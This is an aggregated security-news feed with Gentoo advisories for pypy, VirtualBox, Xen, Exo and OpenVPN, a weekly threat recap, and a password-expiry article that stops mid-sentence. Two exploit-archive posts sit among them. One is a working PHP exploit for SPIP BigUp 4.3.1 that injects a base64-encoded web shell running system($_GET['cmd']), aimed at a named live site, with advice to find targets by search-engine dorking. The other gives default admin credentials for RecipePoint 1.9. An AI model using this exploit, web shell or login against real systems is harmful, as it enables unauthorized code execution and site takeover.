Gentoo Linux Security Advisory 202409-12 - Multiple vulnerabilities have been discovered in pypy and pypy3, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 7.3.3_p37_p1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: pypy, pypy3: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #741496, #741560, #774114, #782520  
       ID: 202409-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in pypy and pypy3, the  
worst of which could lead to arbitrary code execution.

Background  
==========

A fast, compliant alternative implementation of the Python language.

Affected packages  
=================

Package                  Vulnerable         Unaffected  
-----------------------  -----------------  ------------------  
dev-python/pypy          < 7.3.3_p37_p1-r1  >= 7.3.3_p37_p1-r1  
dev-python/pypy-exe      < 7.3.2            >= 7.3.2  
dev-python/pypy-exe-bin  < 7.3.2            Vulnerable!  
dev-python/pypy3         < 7.3.3_p37_p1-r1  >= 7.3.3_p37_p1-r1

Description  
===========

Multiple vulnerabilities have been discovered in pypy. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All pypy users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-7.3.3_p37_p1-r1"  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-exe-7.3.2"  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-exe-bin-7.3.2"

All pypy3 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy3-7.3.3_p37_p1-r1"

References  
==========

[ 1 ] CVE-2020-27619  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27619

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-12

Gentoo Linux Security Advisory 202409-11 - Multiple vulnerabilities have been discovered in Oracle VirtualBox, the worst of which could lead to privilege escalation. Versions greater than or equal to 7.0.12 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Oracle VirtualBox: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #918524  
       ID: 202409-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Oracle VirtualBox, the  
worst of which could lead to privilege escalation.

Background  
==========

VirtualBox is a powerful virtualization product from Oracle.

Affected packages  
=================

Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
app-emulation/virtualbox  < 7.0.12      >= 7.0.12

Description  
===========

Multiple vulnerabilities have been discovered in Oracle VirtualBox.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Oracle VirtualBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-7.0.12"

References  
==========

[ 1 ] CVE-2023-22098  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22098  
[ 2 ] CVE-2023-22099  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22099  
[ 3 ] CVE-2023-22100  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22100

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-11

SPIP BigUp version 4.3.1 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.3.1 php code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP BigUp 4.3.1 Code Injection

Gentoo Linux Security Advisory 202409-10 - Multiple vulnerabilities have been discovered in Xen, the worst of which could lead to privilege escalation. Versions greater than or equal to 4.17.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Xen: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #918669, #921355, #923741, #928620, #929038  
       ID: 202409-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Xen, the worst of which  
could lead to privilege escalation.

Background  
==========

Xen is a bare-metal hypervisor.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-emulation/xen  < 4.17.4      >= 4.17.4

Description  
===========

Multiple vulnerabilities have been discovered in Xen. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Xen users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.17.4"

References  
==========

[ 1 ] CVE-2022-4949  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4949  
[ 2 ] CVE-2022-42336  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42336  
[ 3 ] CVE-2023-28746  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28746  
[ 4 ] CVE-2023-34319  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34319  
[ 5 ] CVE-2023-34320  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34320  
[ 6 ] CVE-2023-34321  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34321  
[ 7 ] CVE-2023-34322  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34322  
[ 8 ] CVE-2023-34323  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34323  
[ 9 ] CVE-2023-34324  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34324  
[ 10 ] CVE-2023-34325  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34325  
[ 11 ] CVE-2023-34327  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34327  
[ 12 ] CVE-2023-34328  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34328  
[ 13 ] CVE-2023-46835  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46835  
[ 14 ] CVE-2023-46836  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46836  
[ 15 ] CVE-2023-46837  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46837  
[ 16 ] CVE-2023-46839  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46839  
[ 17 ] CVE-2023-46840  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46840  
[ 18 ] CVE-2023-46841  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46841  
[ 19 ] CVE-2023-46842  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46842  
[ 20 ] CVE-2024-2193  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2193  
[ 21 ] CVE-2024-31142  
      https://nvd.nist.gov/vuln/detail/CVE-2024-31142  
[ 22 ] XSA-431  
      https://xenbits.xen.org/xsa/advisory-431.html  
[ 23 ] XSA-432  
      https://xenbits.xen.org/xsa/advisory-432.html  
[ 24 ] XSA-436  
      https://xenbits.xen.org/xsa/advisory-436.html  
[ 25 ] XSA-437  
      https://xenbits.xen.org/xsa/advisory-437.html  
[ 26 ] XSA-438  
      https://xenbits.xen.org/xsa/advisory-438.html  
[ 27 ] XSA-439  
      https://xenbits.xen.org/xsa/advisory-439.html  
[ 28 ] XSA-440  
      https://xenbits.xen.org/xsa/advisory-440.html  
[ 29 ] XSA-441  
      https://xenbits.xen.org/xsa/advisory-441.html  
[ 30 ] XSA-442  
      https://xenbits.xen.org/xsa/advisory-442.html  
[ 31 ] XSA-447  
      https://xenbits.xen.org/xsa/advisory-447.html  
[ 32 ] XSA-449  
      https://xenbits.xen.org/xsa/advisory-449.html  
[ 33 ] XSA-450  
      https://xenbits.xen.org/xsa/advisory-450.html  
[ 34 ] XSA-451  
      https://xenbits.xen.org/xsa/advisory-451.html  
[ 35 ] XSA-452  
      https://xenbits.xen.org/xsa/advisory-452.html  
[ 36 ] XSA-453  
      https://xenbits.xen.org/xsa/advisory-453.html  
[ 37 ] XSA-454  
      https://xenbits.xen.org/xsa/advisory-454.html  
[ 38 ] XSA-455  
      https://xenbits.xen.org/xsa/advisory-455.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-10

Gentoo Linux Security Advisory 202409-9 - A vulnerability has been discovered in Exo, which can lead to arbitrary code execution. Versions greater than or equal to 4.17.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Exo: Arbitrary Code Execution  
     Date: September 22, 2024  
     Bugs: #851201  
       ID: 202409-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Exo, which can lead to arbitrary  
code execution.

Background  
==========

Exo is an Xfce library targeted at application development, originally  
developed by os-cillation. It contains various custom widgets and APIs  
extending the functionality of GLib and GTK. It also has some helper  
applications that are used throughout the entire Xfce desktop to manage  
preferred applications and edit .desktop files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
xfce-base/exo  < 4.17.2      >= 4.17.2

Description  
===========

A vulnerability has been discovered in Exo. Please review the CVE  
identifiers referenced below for details.

Impact  
======

Exo executes remote desktop files which may lead to unexpected arbitrary  
code execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Exo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=xfce-base/exo-4.17.2"

References  
==========

[ 1 ] CVE-2022-32278  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32278

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-09

Gentoo Linux Security Advisory 202409-8 - Multiple vulnerabilities have been discovered in OpenVPN, the worst of which could lead to information disclosure. Versions greater than or equal to 2.6.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenVPN: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #835514, #917272  
       ID: 202409-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in OpenVPN, the worst of  
which could lead to information disclosure.

Background  
==========

OpenVPN is a multi-platform, full-featured SSL VPN solution.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-vpn/openvpn  < 2.6.7       >= 2.6.7

Description  
===========

Multiple vulnerabilities have been discovered in OpenVPN. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenVPN users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-vpn/openvpn-2.6.7"

References  
==========

[ 1 ] CVE-2022-0547  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0547  
[ 2 ] CVE-2023-46849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46849  
[ 3 ] CVE-2023-46850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46850

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-08

RecipePoint version 1.9 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : RecipePoint 1.9 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/recipepoint/                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/recipepoint/adminGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

RecipePoint 1.9 Insecure Settings

Hold on tight, folks, because last week's cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling "dream jobs" to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let's dive into the details and see what lessons we can glean

Cybersecurity / Cyber Threat

Hold on tight, folks, because last week's cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling "dream jobs" to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let's dive into the details and see what lessons we can glean from the past week.

****⚡ Threat of the Week****

**Raptor Train Botnet Dismantled:** The U.S. government announced the takedown of the Raptor Train botnet controlled by a China-linked threat actor known as Flax Typhoon. The botnet consisted of over 260,000 devices in June 2024, with victims scattered across North America, Europe, Asia, Africa, and Oceania, and South America. It also attributed the Flax Typhoon threat actor to a publicly-traded, Beijing-based company known as Integrity Technology Group.

****🔔 Top News****

*   **Lazarus Group's New Malware:** The North Korea-linked cyber espionage group known as UNC2970 (aka TEMP.Hermit) has been observed utilizing job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN. The activity is also tracked as Operation Dream Job.
*   **iServer and Ghost Dismantled:** In yet another big win for law enforcement agencies, Europol announced the takedown of an international criminal network that leveraged a phishing platform to unlock stolen or lost mobile phones. The agency, in partnership with the Australian Federal Police (AFP), dismantled an encrypted communications network called Ghost that enabled serious and organized crime across the world.
*   **Iranian APT Acts as Initial Access Provider:** An Iranian threat actor tracked as UNC1860 is acting as an initial access facilitator that provides remote access to target networks by deploying various passive backdoors. This access is then leveraged by other Iranian hacking groups affiliated with the Ministry of Intelligence and Security (MOIS).
*   **Apple Drops Lawsuit against NSO Group:** Apple filed a motion to "voluntarily" dismiss the lawsuit it's pursuing against Israeli commercial spyware vendor NSO Group, citing a shifting risk landscape that could lead to exposure of critical "threat intelligence" information. The lawsuit was filed in November 2021.
*   **Phishing Attacks Exploit HTTP Headers:** A new wave of phishing attacks is abusing refresh entries in HTTP headers to deliver spoofed email login pages that are designed to harvest users' credentials. Targets of the campaigns include entities in South Korea and the U.S.

****📰 Around the Cyber World****

*   **Sandvine Leaves 56 "Non-democratic" Countries:** Sandvine, the company behind middleboxes that have facilitated the delivery of commercial spyware as part of highly-targeted attacks, said it has exited 32 countries and is in process of ceasing operations in another 24 countries, citing elevated threats to digital rights. Earlier this February, the company was added to the U.S. Entity List. "The misuse of deep packet inspection technology is an international problem that threatens free and fair elections, basic human rights, and other digital freedoms we believe are inalienable," it said. It did not disclose the list of countries it's exiting as part of the overhaul.
*   **.mobi Domain Acquired for $20:** Researchers from watchTowr Labs spent a mere $20 to acquire a legacy WHOIS server domain associated with the .mobi top-level domain (TLD) and set up a WHOIS server on that domain. This led to the discovery that over 135,000 unique systems still queried the old WHOIS server over a five day period ending on September 4, 2024, including cybersecurity tools and mail servers for government, military and university entities. The research also showed that the TLS/SSL process for the entire .mobi TLD had been undermined as numerous Certificate Authorities (CAs) were found to be still using the "rogue" WHOIS server to "determine the owners of a domain and where verification details should be sent." Google has since called for stopping the use of WHOIS data for TLS domain verifications.
*   **ServiceNow Misconfigurations Leak Sensitive Data:** Thousands of companies are inadvertently exposing secrets from their internal knowledge base (KB) articles via ServiceNow misconfigurations. AppOmni attributed the issue to "outdated configurations and misconfigured access controls in KBs," likely indicating "a systematic misunderstanding of KB access controls or possibly the accidental replication of at least one instance's poor controls to another through cloning." ServiceNow has published guidance on how to configure their instances to prevent unauthenticated access to KB articles.
*   **Google Cloud Document AI Flaw Fixed:** Speaking of misconfigurations, researchers have found that overly permissive settings in Google Cloud's Document AI service could be leveraged by threat actors to hack into Cloud Storage buckets and steal sensitive information. Vectra AI described the vulnerability as an instance of transitive access abuse.
*   **Microsoft Plans End of Kernel Access for EDR Software:** Following the massive fallout from the CrowdStrike update mishap in July 2024, Microsoft has highlighted Windows 11's "improved security posture and security defaults" that allow for more security capabilities to security software makers outside of kernel mode access. It also said it will collaborate with ecosystem partners to achieve "enhanced reliability without sacrificing security."

**🔥 **Cybersecurity Resources & Insights******— **Upcoming Webinars****

*   **Zero Trust: Anti-Ransomware Armor**: Join our next webinar with Zscaler's Emily Laufer for a deep dive into the 2024 Ransomware Report, uncovering the latest trends, emerging threats, and the zero-trust strategies that can safeguard your organization. Don't become another statistic – Register now and fight back!
*   **SIEM Reboot: From Overload to Oversight:** Drowning in data? Your SIEM should be a lifesaver, not another headache. Join us to uncover how legacy SIEM went wrong, and how a modern approach can simplify security without sacrificing performance. We'll dive into the origins of SIEM, its current challenges, and our community-driven solutions to cut through the noise and empower your security. Register now for a fresh take on SIEM!

**— **Ask the Expert****

*   **Q:** How does Zero Trust differ fundamentally from traditional Perimeter Defense, and what are the key challenges and advantages when transitioning an organization from a Perimeter Defense model to a Zero Trust architecture?

*   **A:** Zero Trust and perimeter defense are two ways to protect computer systems. Zero Trust is like having multiple locks on your doors AND checking IDs at every room, meaning it trusts no one and constantly verifies everyone and everything trying to access anything. It's great for stopping hackers, even if they manage to sneak in, and works well when people work from different places or use cloud services. Perimeter defense is like having a strong wall around your castle, focusing on keeping the bad guys out. But, if someone breaks through, they have easy access to everything inside. This older approach struggles with today's threats and remote work situations. Switching to Zero Trust is like upgrading your security system, but it takes time and money. It's worth it because it provides much better protection. Remember, it's not just one thing, but a whole new way of thinking about security, and you can start small and build up over time. Also, don't ditch the wall completely, it's still useful for basic protection.

**— **Cybersecurity Jargon Buster****

*   **Polymorphic Malware:** Imagine a sneaky virus that keeps changing its disguise (signature) to trick your antivirus. It's like a chameleon, making it tough to catch.
*   **Metamorphic Malware:** This one's even trickier! It's like a shapeshifter, not just changing clothes, but completely transforming its body. It rewrites its own code each time it infects, making it nearly impossible for antivirus to recognize.

**— **Tip of the Week****

**"Think Before You Click" Maze:** Navigate a series of decision points based on real-world scenarios, choosing the safest option to avoid phishing traps and other online threats.

****Conclusion****

"To err is human; to forgive, divine." - Alexander Pope. But in the realm of cybersecurity, forgiveness can be costly. Let's learn from these mistakes, strengthen our defenses, and keep the digital world a safer place for all.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Last Week's Top Threats and Trends (September 16-22)

Password resets can be frustrating for end users. Nobody likes being interrupted by the ‘time to change your password’ notification – and they like it even less when the new passwords they create are rejected by their organization’s password policy. IT teams share the pain, with resetting passwords via service desk tickets and support calls being an everyday burden. Despite this, it’s commonly

Password Management / Data Breach

Password resets can be frustrating for end users. Nobody likes being interrupted by the 'time to change your password' notification – and they like it even less when the new passwords they create are rejected by their organization's password policy. IT teams share the pain, with resetting passwords via service desk tickets and support calls being an everyday burden. Despite this, it's commonly accepted that all passwords should expire after a set period of time.

Why is this the case? Do you need password expiries at all? Explore the reason expiries exist and why setting passwords to 'never expire' might save some headaches, but not be the best idea for cybersecurity.

**Why do we have password expiries?**

The traditional 90-day password reset policy stems from the need to protect against brute-force attacks. Organizations typically store passwords as hashes, which are scrambled versions of the actual passwords created using cryptographic hash functions (CHFs). When a user enters their password, it's hashed and compared to the stored hash. Attackers attempting to crack these passwords must guess the correct one by running potential passwords through the same hashing algorithm and comparing the results. The process can further be complicated for attackers by techniques like salting, where random strings are added to passwords before hashing.

Brute-force attacks depend on several factors, including the computational power available to the attacker and the strength of the password. The 90-day reset period was considered a balanced approach to outpace brute-force attacks while not burdening users with too frequent changes. Advances in technology, however, have reduced the time required to crack passwords, prompting a re-evaluation of this policy. Despite this, the 90-day expiry remains a recommendation in many compliance standards, including PCI.

**Why have some organizations got rid of expiries?**

One of the main arguments against regular password expiry is that it can lead to the reuse of weak passwords. Users often make slight changes to their existing passwords, such as changing 'Password1!' to 'Password2!'. This practice undermines the security benefits of password changes. The real issue here though is not the act of resetting passwords but rather the organization's policy that allows weak passwords in the first place.

The bigger reason organizations have opted for 'never expire' passwords is reducing IT and service desk burden. The cost and burden of password resets on IT help desks are significant. Gartner estimates that 20-50% of IT help desk calls are related to password resets, with each reset costing around $70 in labor according to Forrester. This adds up, especially when users frequently forget their passwords after being forced to create new ones.

Some organizations may therefore be tempted to force end users into creating one very strong password and then setting the passwords to 'never expire' in order to cut down on IT burden and reset costs.

**What are the risks with 'never expire' passwords?**

Having a strong password and never changing it might give someone a false sense of security. A strong password isn't immune to threats; it can be vulnerable to phishing schemes, data breaches, or other types of cyber incidents without the user realizing it. The Specops Breached Password Report found 83% of passwords that were compromised met the regulatory standards for length and complexity.

An organization might have a strong password policy where every end user is forced to create a strong password that's resistant to brute force attacks. But what happens if the employee decides to reuse their password for their Facebook, Netflix, and all other personal applications too? The risk of the password being compromised increases a lot, regardless of the internal security measures the organization has in place. A survey by LastPass found 91% of end users understood the risk of password reuse – but 59% did it anyway.

Another risk with 'never expire' passwords is that an attacker could use a set of compromised credentials for a long period of time. The Ponemon Institute found that it typically takes an organization about 207 days to identify a breach. While mandating password expiration could be beneficial here, it's likely that an attacker would have already achieved their objectives by the time the password expires. Consequently, NIST and other guidelines advise organizations to only set passwords to never expire if they have mechanisms to identify compromised accounts.

**How to detect compromised passwords**

Organizations must adopt a comprehensive password strategy that goes beyond regular expiry. This includes guiding users to create strong passphrases of at least 15 characters. Such a policy can significantly reduce vulnerability to brute-force attacks. Encouraging end users to create longer passwords can also be achieved through length-based aging, where longer, stronger passwords are allowed to be used for extended periods before expiring. This approach eliminates the need for a one-size-fits-all expiry time, provided users adhere to the organization's password policy.

Picture show with building stronger passwords and length-based ageing

